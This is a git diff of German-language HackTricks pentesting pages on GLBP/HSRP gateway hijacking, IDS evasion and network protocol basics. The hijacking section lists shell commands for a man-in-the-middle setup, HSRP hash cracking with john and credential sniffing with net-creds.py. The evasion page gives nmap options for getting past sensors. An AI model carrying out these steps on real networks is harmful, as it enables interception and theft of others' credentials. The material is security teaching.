[**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegramm-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %}
{% embed url="https://websec.nl/" %} - ## FHRP Hijacking Überblick ### Einblicke in FHRP -FHRP ist darauf ausgelegt, Netzwerkrobustheit zu bieten, indem mehrere Router zu einer einzigen virtuellen Einheit zusammengeführt werden, um die Lastenverteilung und Ausfallsicherheit zu verbessern. Cisco Systems führte prominente Protokolle in dieser Suite ein, wie GLBP und HSRP. +FHRP ist darauf ausgelegt, Netzwerkrobustheit zu bieten, indem mehrere Router zu einer einzigen virtuellen Einheit zusammengeführt werden, um die Lastenverteilung und Ausfallsicherheit zu verbessern. Cisco Systems hat prominente Protokolle in dieser Suite eingeführt, wie z.B. GLBP und HSRP. ### GLBP Protokoll Einblicke -Ciscos Kreation, GLBP, funktioniert im TCP/IP-Stack und nutzt UDP auf Port 3222 für die Kommunikation. Router in einer GLBP-Gruppe tauschen "hello"-Pakete in 3-Sekunden-Intervallen aus. Wenn ein Router es versäumt, diese Pakete 10 Sekunden lang zu senden, wird davon ausgegangen, dass er offline ist. Diese Timer sind jedoch nicht festgelegt und können geändert werden. +Ciscos Kreation, GLBP, funktioniert auf dem TCP/IP-Stack und nutzt UDP auf Port 3222 für die Kommunikation. Router in einer GLBP-Gruppe tauschen "hello"-Pakete in 3-Sekunden-Intervallen aus. Wenn ein Router es versäumt, diese Pakete 10 Sekunden lang zu senden, wird davon ausgegangen, dass er offline ist. Diese Timer sind jedoch nicht festgelegt und können geändert werden. ### GLBP Operationen und Lastverteilung -GLBP zeichnet sich dadurch aus, dass es die Lastenverteilung über Router mithilfe einer einzigen virtuellen IP in Verbindung mit mehreren virtuellen MAC-Adressen ermöglicht. In einer GLBP-Gruppe ist jeder Router am Paketweiterleiten beteiligt. Im Gegensatz zu HSRP/VRRP bietet GLBP echtes Lastenausgleich durch verschiedene Mechanismen: +GLBP zeichnet sich dadurch aus, dass es die Lastenverteilung über Router mithilfe einer einzigen virtuellen IP in Verbindung mit mehreren virtuellen MAC-Adressen ermöglicht. In einer GLBP-Gruppe ist jeder Router am Paketweiterleitungsprozess beteiligt. Im Gegensatz zu HSRP/VRRP bietet GLBP echtes Lastenausgleich durch verschiedene Mechanismen: -- **Host-abhängiger Lastenausgleich:** Hält die konsistente AVF-MAC-Adresszuweisung an einen Host aufrecht, was für stabile NAT-Konfigurationen unerlässlich ist. -- **Round-Robin-Lastenausgleich:** Der Standardansatz, der die AVF-MAC-Adresszuweisung abwechselnd unter den anfragenden Hosts verteilt. +- **Host-abhängiger Lastenausgleich:** Behält die Zuweisung einer konsistenten AVF-MAC-Adresse an einen Host bei, was für stabile NAT-Konfigurationen unerlässlich ist. +- **Round-Robin-Lastenausgleich:** Der Standardansatz, der die Zuweisung von AVF-MAC-Adressen abwechselnd unter den anfragenden Hosts durchführt. - **Gewichteter Round-Robin-Lastenausgleich:** Verteilt die Last basierend auf vordefinierten "Gewichts"-Metriken. ### Schlüsselkomponenten und Begriffe in GLBP @@ -39,24 +39,24 @@ GLBP zeichnet sich dadurch aus, dass es die Lastenverteilung über Router mithil - **AVF (Active Virtual Forwarder):** Ein Router, der zur Verwaltung des Netzwerkverkehrs bestimmt ist. - **GLBP-Priorität:** Eine Metrik, die den AVG bestimmt, beginnend mit einem Standardwert von 100 und im Bereich von 1 bis 255. - **GLBP-Gewicht:** Spiegelt die aktuelle Last auf einem Router wider, die entweder manuell oder durch Objektverfolgung angepasst werden kann. -- **GLBP-Virtuelle IP-Adresse:** Dient als Standardgateway des Netzwerks für alle verbundenen Geräte. +- **GLBP-Virtuelle IP-Adresse:** Dient als Standard-Gateway des Netzwerks für alle verbundenen Geräte. Für Interaktionen verwendet GLBP die reservierte Multicast-Adresse 224.0.0.102 und den UDP-Port 3222. Router senden "hello"-Pakete in 3-Sekunden-Intervallen und gelten als nicht betriebsbereit, wenn ein Paket über einen Zeitraum von 10 Sekunden verpasst wird. ### GLBP Angriffsmechanismus -Ein Angreifer kann zum primären Router werden, indem er ein GLBP-Paket mit dem höchsten Prioritätswert (255) sendet. Dies kann zu DoS- oder MITM-Angriffen führen, die den Verkehr abfangen oder umleiten. +Ein Angreifer kann zum primären Router werden, indem er ein GLBP-Paket mit dem höchsten Prioritätswert (255) sendet. Dies kann zu DoS- oder MITM-Angriffen führen, die das Abfangen oder Umleiten von Datenverkehr ermöglichen. ### Ausführen eines GLBP-Angriffs mit Loki -[Loki](https://github.com/raizo62/loki_on_kali) kann einen GLBP-Angriff durchführen, indem er ein Paket mit Priorität und Gewicht auf 255 injiziert. Vor dem Angriff sind Schritte wie das Sammeln von Informationen wie der virtuellen IP-Adresse, der Authentifizierungspräsenz und den Routerprioritätswerten mithilfe von Tools wie Wireshark erforderlich. +[Loki](https://github.com/raizo62/loki_on_kali) kann einen GLBP-Angriff durchführen, indem ein Paket mit einer Priorität und einem Gewicht von 255 eingespeist wird. Vor dem Angriff sind Schritte wie das Sammeln von Informationen wie der virtuellen IP-Adresse, der Authentifizierungspräsenz und den Router-Prioritätswerten mithilfe von Tools wie Wireshark erforderlich. Angriffsschritte: -1. Wechseln Sie in den Promiscuous-Modus und aktivieren Sie die IP-Weiterleitung. +1. Wechseln Sie in den Promiskuitivmodus und aktivieren Sie die IP-Weiterleitung. 2. Identifizieren Sie den Zielrouter und rufen Sie dessen IP ab. 3. Generieren Sie eine Gratuits-ARP. 4. Injizieren Sie ein bösartiges GLBP-Paket, das den AVG imitiert. 5. Weisen Sie dem Netzwerkinterface des Angreifers eine sekundäre IP-Adresse zu, die der GLBP-Virtual-IP entspricht. 6. Implementieren Sie SNAT für eine vollständige Traffic-Sichtbarkeit. -7. Passen Sie das Routing an, um weiterhin den Internetzugang über den ursprünglichen AVG-Router sicherzustellen. +7. Passen Sie das Routing an, um weiterhin den Internetzugriff über den ursprünglichen AVG-Router zu gewährleisten. Durch Befolgen dieser Schritte positioniert sich der Angreifer als "Man in the Middle", der in der Lage ist, den Netzwerkverkehr abzufangen und zu analysieren, einschließlich unverschlüsselter oder sensibler Daten. @@ -76,18 +76,18 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` ### Passive Erklärung des HSRP-Hijackings mit Befehlsdetails -#### Übersicht über HSRP (Hot Standby Router/Redundancy Protocol) +#### Überblick über HSRP (Hot Standby Router/Redundancy Protocol) HSRP ist ein von Cisco entwickeltes Protokoll für die Redundanz des Netzwerkgateways. Es ermöglicht die Konfiguration mehrerer physischer Router zu einer einzigen logischen Einheit mit einer gemeinsamen IP-Adresse. Diese logische Einheit wird von einem primären Router verwaltet, der für die Weiterleitung des Datenverkehrs verantwortlich ist. Im Gegensatz zu GLBP, das Metriken wie Priorität und Gewicht für die Lastverteilung verwendet, verlässt sich HSRP auf einen einzigen aktiven Router für das Traffic-Management. -#### Rollen und Begriffe in HSRP +#### Rollen und Terminologie in HSRP - **HSRP Active Router**: Das Gerät, das als Gateway fungiert und den Datenverkehrsfluss verwaltet. - **HSRP Standby Router**: Ein Backup-Router, der bereit ist, die Rolle des aktiven Routers zu übernehmen, falls dieser ausfällt. - **HSRP-Gruppe**: Eine Gruppe von Routern, die zusammenarbeiten, um einen einzigen widerstandsfähigen virtuellen Router zu bilden. -- **HSRP-MAC-Adresse**: Eine virtuelle MAC-Adresse, die dem logischen Router im HSRP-Setup zugewiesen ist. -- **HSRP-Virtuelle IP-Adresse**: Die virtuelle IP-Adresse der HSRP-Gruppe, die als Standardgateway für verbundene Geräte fungiert. +- **HSRP MAC-Adresse**: Eine virtuelle MAC-Adresse, die dem logischen Router im HSRP-Setup zugewiesen ist. +- **HSRP Virtuelle IP-Adresse**: Die virtuelle IP-Adresse der HSRP-Gruppe, die als Standardgateway für verbundene Geräte fungiert. #### HSRP-Versionen -HSRP gibt es in zwei Versionen, HSRPv1 und HSRPv2, die sich hauptsächlich in der Gruppenkapazität, der Verwendung von Multicast-IPs und der Struktur der virtuellen MAC-Adresse unterscheiden. Das Protokoll verwendet spezifische Multicast-IP-Adressen für den Austausch von Dienstinformationen, wobei Hello-Pakete alle 3 Sekunden gesendet werden. Ein Router gilt als inaktiv, wenn innerhalb eines Intervalls von 10 Sekunden kein Paket empfangen wird. +HSRP gibt es in zwei Versionen, HSRPv1 und HSRPv2, die sich hauptsächlich in der Gruppenkapazität, der Verwendung von Multicast-IP und der Struktur der virtuellen MAC-Adresse unterscheiden. Das Protokoll verwendet spezifische Multicast-IP-Adressen für den Austausch von Dienstinformationen, wobei Hello-Pakete alle 3 Sekunden gesendet werden. Ein Router gilt als inaktiv, wenn innerhalb eines Intervalls von 10 Sekunden kein Paket empfangen wird. #### HSRP-Angriffsmechanismus HSRP-Angriffe beinhalten das gewaltsame Übernehmen der Rolle des aktiven Routers durch das Einspritzen eines maximalen Prioritätswerts. Dies kann zu einem Man-In-The-Middle (MITM)-Angriff führen. Wesentliche Vor-Angriffsschritte umfassen das Sammeln von Daten über das HSRP-Setup, was mit Wireshark für die Traffic-Analyse durchgeführt werden kann. @@ -106,10 +106,10 @@ python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes john --wordlist=mywordlist.txt hsrp_hashes ``` -**Ausführen der HSRP-Injektion mit Loki** +**Ausführen von HSRP-Injektion mit Loki** 1. Starten Sie Loki, um HSRP-Anzeigen zu identifizieren. -2. Setzen Sie die Netzwerkschnittstelle in den Promiscuous-Modus und aktivieren Sie die IP-Weiterleitung. +2. Setzen Sie die Netzwerkschnittstelle in den Promiscuous-Modus und aktivieren Sie IP-Weiterleitung. ```shell sudo ip link set eth0 promisc on sudo sysctl -w net.ipv4.ip_forward=1 @@ -130,4 +130,4 @@ sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 sudo python2 net-creds.py -i eth0 ``` -Durch die Ausführung dieser Schritte kann der Angreifer in die Lage versetzt werden, den Datenverkehr abzufangen und zu manipulieren, ähnlich dem Verfahren beim GLBP-Hijacking. Dies verdeutlicht die Schwachstelle in Redundanzprotokollen wie HSRP und die Notwendigkeit robuster Sicherheitsmaßnahmen. +Durch die Ausführung dieser Schritte kann der Angreifer in die Lage versetzt werden, den Datenverkehr abzufangen und zu manipulieren, ähnlich dem Verfahren für das GLBP-Hijacking. Dies verdeutlicht die Schwachstelle in Redundanzprotokollen wie HSRP und die Notwendigkeit robuster Sicherheitsmaßnahmen. diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index a30b80d7a..84ff9a007 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,49 +1,50 @@ +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} # **TTL-Manipulation** -Senden Sie einige Pakete mit einer TTL, die ausreicht, um das IDS/IPS zu erreichen, aber nicht ausreicht, um das endgültige System zu erreichen. Und dann senden Sie weitere Pakete mit den gleichen Sequenzen wie die anderen, so dass das IPS/IDS denkt, dass es sich um Wiederholungen handelt und sie nicht überprüft, obwohl sie tatsächlich den bösartigen Inhalt tragen. +Senden Sie einige Pakete mit einer TTL, die ausreicht, um beim IDS/IPS anzukommen, aber nicht ausreicht, um beim endgültigen System anzukommen. Senden Sie dann weitere Pakete mit den gleichen Sequenzen wie die anderen, sodass das IPS/IDS denkt, dass es sich um Wiederholungen handelt und sie nicht überprüft, obwohl sie tatsächlich den bösartigen Inhalt tragen. **Nmap-Option:** `--ttlvalue ` -# Vermeidung von Signaturen +# Signaturen vermeiden -Fügen Sie einfach Mülldaten zu den Paketen hinzu, damit die IPS/IDS-Signatur vermieden wird. +Fügen Sie einfach Mülldaten zu den Paketen hinzu, um die IPS/IDS-Signatur zu umgehen. **Nmap-Option:** `--data-length 25` # **Fragmentierte Pakete** -Fragmentieren Sie einfach die Pakete und senden Sie sie. Wenn das IDS/IPS nicht in der Lage ist, sie wieder zusammenzusetzen, gelangen sie zum endgültigen Host. +Einfach die Pakete fragmentieren und senden. Wenn das IDS/IPS nicht in der Lage ist, sie wieder zusammenzusetzen, gelangen sie zum endgültigen Host. **Nmap-Option:** `-f` # **Ungültige** _**Prüfsumme**_ -Sensoren berechnen in der Regel aus Leistungsgründen keine Prüfsumme. Ein Angreifer kann also ein Paket senden, das vom Sensor **interpretiert, aber vom endgültigen Host abgelehnt wird**. Beispiel: +Sensoren berechnen normalerweise keine Prüfsumme aus Leistungsgründen. Ein Angreifer kann also ein Paket senden, das vom Sensor interpretiert, aber vom endgültigen Host abgelehnt wird. Beispiel: -Senden Sie ein Paket mit der Flagge RST und einer ungültigen Prüfsumme, so dass das IPS/IDS denken kann, dass dieses Paket die Verbindung schließen wird, der endgültige Host das Paket jedoch aufgrund der ungültigen Prüfsumme verwerfen wird. +Senden Sie ein Paket mit der Flagge RST und einer ungültigen Prüfsumme, sodass das IPS/IDS möglicherweise denkt, dass dieses Paket die Verbindung schließen wird, der endgültige Host das Paket jedoch aufgrund der ungültigen Prüfsumme verwerfen wird. # **Ungewöhnliche IP- und TCP-Optionen** -Ein Sensor kann Pakete mit bestimmten Flags und Optionen in IP- und TCP-Headern ignorieren, während der Zielhost das Paket bei Erhalt akzeptiert. +Ein Sensor könnte Pakete mit bestimmten Flags und Optionen innerhalb von IP- und TCP-Headern ignorieren, während der Zielhost das Paket bei Erhalt akzeptiert. # **Überlappung** -Es ist möglich, dass bei der Fragmentierung eines Pakets eine Art Überlappung zwischen den Paketen besteht (vielleicht überlappen sich die ersten 8 Bytes von Paket 2 mit den letzten 8 Bytes von Paket 1 und die letzten 8 Bytes von Paket 2 mit den ersten 8 Bytes von Paket 3). Wenn das IDS/IPS sie auf eine andere Weise als der endgültige Host wieder zusammensetzt, wird ein anderes Paket interpretiert.\ +Es ist möglich, dass bei der Fragmentierung eines Pakets eine Art Überlappung zwischen den Paketen besteht (vielleicht überlappen sich die ersten 8 Bytes des Pakets 2 mit den letzten 8 Bytes des Pakets 1, und die letzten 8 Bytes des Pakets 2 überlappen sich mit den ersten 8 Bytes des Pakets 3). Dann, wenn das IDS/IPS sie auf eine andere Weise wieder zusammensetzt als der endgültige Host, wird ein anderes Paket interpretiert.\ Oder vielleicht kommen 2 Pakete mit dem gleichen Offset an und der Host muss entscheiden, welches er nimmt. * **BSD**: Es bevorzugt Pakete mit kleinerem _Offset_. Bei Paketen mit dem gleichen Offset wählt es das erste. @@ -56,16 +57,17 @@ Oder vielleicht kommen 2 Pakete mit dem gleichen Offset an und der Host muss ent * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 7276aa815..bf023869f 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,74 +1,76 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys senden.
+{% endhint %} ## Multicast DNS (mDNS) -Das **mDNS**-Protokoll ist für die IP-Adressauflösung in kleinen, lokalen Netzwerken ohne dedizierten Namensserver konzipiert. Es funktioniert durch Multicasting einer Abfrage im Subnetz, wodurch der Host mit dem angegebenen Namen mit seiner IP-Adresse antwortet. Alle Geräte im Subnetz können dann ihre mDNS-Caches mit diesen Informationen aktualisieren. +Das **mDNS**-Protokoll ist für die IP-Adressauflösung in kleinen, lokalen Netzwerken ohne dedizierten Namensserver konzipiert. Es funktioniert, indem eine Abfrage innerhalb des Subnetzes multicastet wird, um den Host mit dem angegebenen Namen dazu zu bringen, mit seiner IP-Adresse zu antworten. Alle Geräte im Subnetz können dann ihre mDNS-Caches mit diesen Informationen aktualisieren. -Wichtige Punkte, die beachtet werden sollten: -- **Aufgabe des Domänennamens**: Ein Host kann seinen Domänennamen freigeben, indem er ein Paket mit einer TTL von null sendet. -- **Verwendungseinschränkung**: mDNS löst in der Regel nur Namen mit der Endung **.local** auf. Konflikte mit nicht-mDNS-Hosts in dieser Domäne erfordern Netzwerkkonfigurationsanpassungen. +Wichtige Punkte: +- **Freigabe des Domänennamens**: Ein Host kann seinen Domänennamen freigeben, indem er ein Paket mit einer TTL von null sendet. +- **Nutzungsbeschränkung**: mDNS löst in der Regel nur Namen auf, die mit **.local** enden. Konflikte mit nicht-mDNS-Hosts in diesem Bereich erfordern Netzwerkkonfigurationsanpassungen. - **Netzwerkdetails**: -- Ethernet-Multicast-MAC-Adressen: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. -- IP-Adressen: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. -- Funktioniert über UDP-Port 5353. + - Ethernet-Multicast-MAC-Adressen: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. + - IP-Adressen: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. + - Funktioniert über UDP-Port 5353. - mDNS-Abfragen sind auf das lokale Netzwerk beschränkt und überqueren keine Router. ## DNS-SD (Service Discovery) -DNS-SD ist ein Protokoll zum Entdecken von Diensten in einem Netzwerk durch Abfragen bestimmter Domänennamen (z. B. `_printers._tcp.local`). Eine Antwort enthält alle zugehörigen Domänen, wie in diesem Fall verfügbare Drucker. Eine umfassende Liste der Diensttypen finden Sie [hier](http://www.dns-sd.org/ServiceTypes.html). +DNS-SD ist ein Protokoll zur Entdeckung von Diensten in einem Netzwerk durch Abfragen bestimmter Domänennamen (z. B. `_printers._tcp.local`). Eine Antwort enthält alle zugehörigen Domänen, wie z. B. verfügbare Drucker in diesem Fall. Eine umfassende Liste von Diensttypen finden Sie [hier](http://www.dns-sd.org/ServiceTypes.html). ## SSDP (Simple Service Discovery Protocol) -SSDP erleichtert die Entdeckung von Netzwerkdiensten und wird hauptsächlich von UPnP verwendet. Es handelt sich um ein textbasiertes Protokoll, das UDP über Port 1900 mit Multicast-Adressierung verwendet. Für IPv4 ist die zugewiesene Multicast-Adresse `239.255.255.250`. SSDP basiert auf [HTTPU](https://en.wikipedia.org/wiki/HTTPU), einer Erweiterung von HTTP für UDP. +SSDP erleichtert die Entdeckung von Netzwerkdiensten und wird hauptsächlich von UPnP genutzt. Es handelt sich um ein textbasiertes Protokoll, das UDP über Port 1900 mit Multicast-Adressierung verwendet. Für IPv4 ist die zugewiesene Multicast-Adresse `239.255.255.250`. SSDP basiert auf [HTTPU](https://en.wikipedia.org/wiki/HTTPU), einer Erweiterung von HTTP für UDP. -## Web Service for Devices (WSD) -Geräte, die mit einem Netzwerk verbunden sind, können verfügbare Dienste wie Drucker über den Web Service for Devices (WSD) identifizieren. Dies erfolgt durch das Senden von UDP-Paketen. Geräte, die Dienste suchen, senden Anfragen, während Dienstanbieter ihre Angebote bekannt geben. +## Webdienst für Geräte (WSD) +Geräte, die mit einem Netzwerk verbunden sind, können über den Webdienst für Geräte (WSD) verfügbare Dienste wie Drucker identifizieren. Dies beinhaltet das Aussenden von UDP-Paketen. Geräte, die Dienste suchen, senden Anfragen, während Dienstanbieter ihre Angebote bekannt geben. ## OAuth 2.0 -OAuth 2.0 ist ein Protokoll, das sicheres, selektives Teilen von Benutzerinformationen zwischen Diensten ermöglicht. Es ermöglicht beispielsweise Diensten den Zugriff auf Benutzerdaten von Google ohne mehrfache Anmeldungen. Der Prozess umfasst die Benutzerauthentifizierung, die Autorisierung durch den Benutzer und die Generierung eines Tokens durch Google, das dem Dienst den Zugriff auf die angegebenen Benutzerdaten ermöglicht. +OAuth 2.0 ist ein Protokoll, das sicheres, selektives Teilen von Benutzerinformationen zwischen Diensten ermöglicht. Es ermöglicht beispielsweise Diensten den Zugriff auf Benutzerdaten von Google ohne mehrfache Anmeldungen. Der Prozess umfasst die Benutzerauthentifizierung, die Autorisierung durch den Benutzer und die Token-Generierung durch Google, die dem Dienst den Zugriff auf die angegebenen Benutzerdaten ermöglicht. ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) ist ein Netzwerkzugriffsprotokoll, das hauptsächlich von ISPs verwendet wird. Es unterstützt Authentifizierung, Autorisierung und Abrechnung. Die Benutzeranmeldeinformationen werden von einem RADIUS-Server überprüft, möglicherweise einschließlich der Überprüfung der Netzwerkadresse zur Erhöhung der Sicherheit. Nach der Authentifizierung erhalten Benutzer Zugriff auf das Netzwerk, und ihre Sitzungsdetails werden zu Abrechnungs- und statistischen Zwecken verfolgt. +RADIUS (Remote Authentication Dial-In User Service) ist ein Netzwerkzugriffsprotokoll, das hauptsächlich von ISPs verwendet wird. Es unterstützt Authentifizierung, Autorisierung und Abrechnung. Benutzeranmeldeinformationen werden von einem RADIUS-Server überprüft, möglicherweise einschließlich der Überprüfung der Netzwerkadresse für zusätzliche Sicherheit. Nach der Authentifizierung erhalten Benutzer Netzwerkzugriff, und ihre Sitzungsdetails werden für Abrechnungs- und statistische Zwecke verfolgt. ## SMB und NetBIOS ### SMB (Server Message Block) -SMB ist ein Protokoll zum Freigeben von Dateien, Druckern und Ports. Es funktioniert direkt über TCP (Port 445) oder über NetBIOS über TCP (Ports 137, 138). Diese Dual-Kompatibilität verbessert die Konnektivität mit verschiedenen Geräten. +SMB ist ein Protokoll zum Freigeben von Dateien, Druckern und Ports. Es funktioniert direkt über TCP (Port 445) oder über NetBIOS über TCP (Ports 137, 138). Diese doppelte Kompatibilität verbessert die Konnektivität mit verschiedenen Geräten. ### NetBIOS (Network Basic Input/Output System) -NetBIOS verwaltet Netzwerksitzungen und Verbindungen für die Ressourcenfreigabe. Es unterstützt eindeutige Namen für Geräte und Gruppennamen für mehrere Geräte, was gezielte oder Broadcast-Nachrichten ermöglicht. Die Kommunikation kann verbindungslos (ohne Bestätigung) oder verbindungsorientiert (sitzungsbasiert) sein. Während NetBIOS traditionell über Protokolle wie IPC/IPX funktioniert, wird es häufig über TCP/IP verwendet. NetBEUI, ein zugehöriges Protokoll, ist für seine Geschwindigkeit bekannt, war jedoch aufgrund der Rundsendungen auch recht umfangreich. +NetBIOS verwaltet Netzwerksitzungen und -verbindungen für die Ressourcenfreigabe. Es unterstützt eindeutige Namen für Geräte und Gruppennamen für mehrere Geräte, was gezielte oder Broadcast-Nachrichten ermöglicht. Die Kommunikation kann verbindungslos (keine Bestätigung) oder verbindungsorientiert (sitzungsbasiert) sein. Während NetBIOS traditionell über Protokolle wie IPC/IPX arbeitet, wird es häufig über TCP/IP verwendet. NetBEUI, ein zugehöriges Protokoll, ist für seine Geschwindigkeit bekannt, war jedoch aufgrund der Rundsendungen auch recht ausführlich. ## LDAP (Lightweight Directory Access Protocol) -LDAP ist ein Protokoll, das die Verwaltung und den Zugriff auf Verzeichnisinformationen über TCP/IP ermöglicht. Es unterstützt verschiedene Operationen zum Abfragen und Ändern von Verzeichnisinformationen. Vorwiegend wird es für den Zugriff auf und die Pflege von verteilten Verzeichnisdiensten verwendet, die die Interaktion mit für die LDAP-Kommunikation konzipierten Datenbanken ermöglichen. +LDAP ist ein Protokoll, das die Verwaltung und den Zugriff auf Verzeichnisinformationen über TCP/IP ermöglicht. Es unterstützt verschiedene Operationen zum Abfragen und Ändern von Verzeichnisinformationen. Vorwiegend wird es für den Zugriff auf und die Pflege von verteilten Verzeichnisdiensten genutzt, die die Interaktion mit für LDAP-Kommunikation konzipierten Datenbanken ermöglichen. ## Active Directory (AD) -Active Directory ist eine netzwerkzugängliche Datenbank, die Objekte wie Benutzer, Gruppen, Berechtigungen und Ressourcen enthält und die zentrale Verwaltung von Netzwerkentitäten ermöglicht. AD organisiert seine Daten in einer hierarchischen Struktur von Domänen, die Server, Gruppen und Benutzer 